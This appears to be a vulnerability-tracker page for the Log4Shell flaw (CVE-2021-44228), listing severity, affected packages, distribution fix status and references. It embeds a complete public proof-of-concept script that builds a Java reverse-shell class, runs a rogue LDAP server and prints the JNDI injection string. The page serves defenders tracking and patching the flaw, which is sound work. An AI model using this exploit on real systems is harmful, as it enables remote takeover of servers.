CVE-2021-44228
critical
KEV
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
CISA KEV
- Vendor
- Apache
- Product
- Log4j2
- Due date
- 2021-12-24
Predictions
Exploit likelihood
99%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
AD Manager Plus 7122 - Remote Code Execution (RCE)
Source code queued for fetch โ refresh in a moment.
Apache Log4j 2 - Remote Code Execution (RCE)
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
init(autoreset=True)
def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
def payload(userip , webport , lport):
genExploit = (
"""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%s;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
# writing the exploit to Exploit.java file
try:
f = open("Exploit.java", "w")
f.write(genExploit)
f.close()
print(Fore.GREEN + '[+] Exploit java class created success')
except Exception as e:
print(Fore.RED + f'[-] Something went wrong {e.toString()}')
checkJavaAvailible()
print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
t1.start()
# start the web server
httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
httpd.serve_forever()
def checkJavaAvailible():
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if(javaver != 0):
print(Fore.RED + '[-] Java is not installed inside the repository ')
sys.exit()
def createLdapServer(userip, lport):
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
url = "
http://{}:{}/#Exploit".format
(userip, lport)
subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
"target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
def header():
print(Fore.BLUE+"""
[!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
if __name__ == "__main__":
header()
try:
parser = argparse.ArgumentParser(description='please enter the values ')
parser.add_argument('--userip', metavar='userip', type=str,
nargs='+', help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport', metavar='webport', type=str,
nargs='+', help='listener port for HTTP port')
parser.add_argument('--lport', metavar='lport', type=str,
nargs='+', help='Netcat Port')
args = parser.parse_args()
#print(args.userip)
payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
except KeyboardInterrupt:
print(Fore.RED + "user interupted the program.")
sys.exit(0)Apache Log4j2 2.14.1 - Information Disclosure
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Source code queued for fetch โ refresh in a moment.
Source fetch failed: fetch_error โ view the original via the link above.
Source code queued for fetch โ refresh in a moment.
Source code queued for fetch โ refresh in a moment.
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Affected | โ |
Arch Fixed 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Fixed | 2.11.1-2 |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 0 |
| sid | Fixed | 0 |
| forky | Fixed | 0 |
| bullseye | Fixed | 0 |
| bookworm | Fixed | 0 |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Maven | org.apache.logging.log4j:log4j-core | >=2.13.0,<2.15.0 | 2.15.0 |
| Maven | org.apache.logging.log4j:log4j-core | >=2.0-beta9,<2.3.1 | 2.3.1 |
| Maven | org.apache.logging.log4j:log4j-core | >=2.4,<2.12.2 | 2.12.2 |
| Maven | com.guicedee.services:log4j-core | <=1.2.1.2-jre17 | |
| Maven | org.xbib.elasticsearch:log4j | | |
| Maven | uk.co.nichesolutions.logging.log4j:log4j-core | | |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.8.0,<1.9.2 | 1.9.2 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.10.0,<1.10.8 | 1.10.8 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.11.0,<1.11.10 | 1.11.10 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=2.0.0,<2.0.11 | 2.0.11 |
References
- https://security-tracker.debian.org/tracker/CVE-2021-44228
- https://www.suse.com/security/cve/CVE-2021-44228.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/apache/logging-log4j2/pull/608
- https://github.com/github/advisory-database/pull/5501
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
- https://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
- https://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- https://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
- https://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://seclists.org/fulldisclosure/2022/Dec/2
- https://seclists.org/fulldisclosure/2022/Jul/11
- https://seclists.org/fulldisclosure/2022/Mar/23
- https://security.netapp.com/advisory/ntap-20211210-0007
- https://support.apple.com/kb/HT213189
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://twitter.com/kurtseifried/status/1469345530182455296
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228
- https://www.debian.org/security/2021/dsa-5020
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
- https://www.kb.cert.org/vuls/id/930724
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.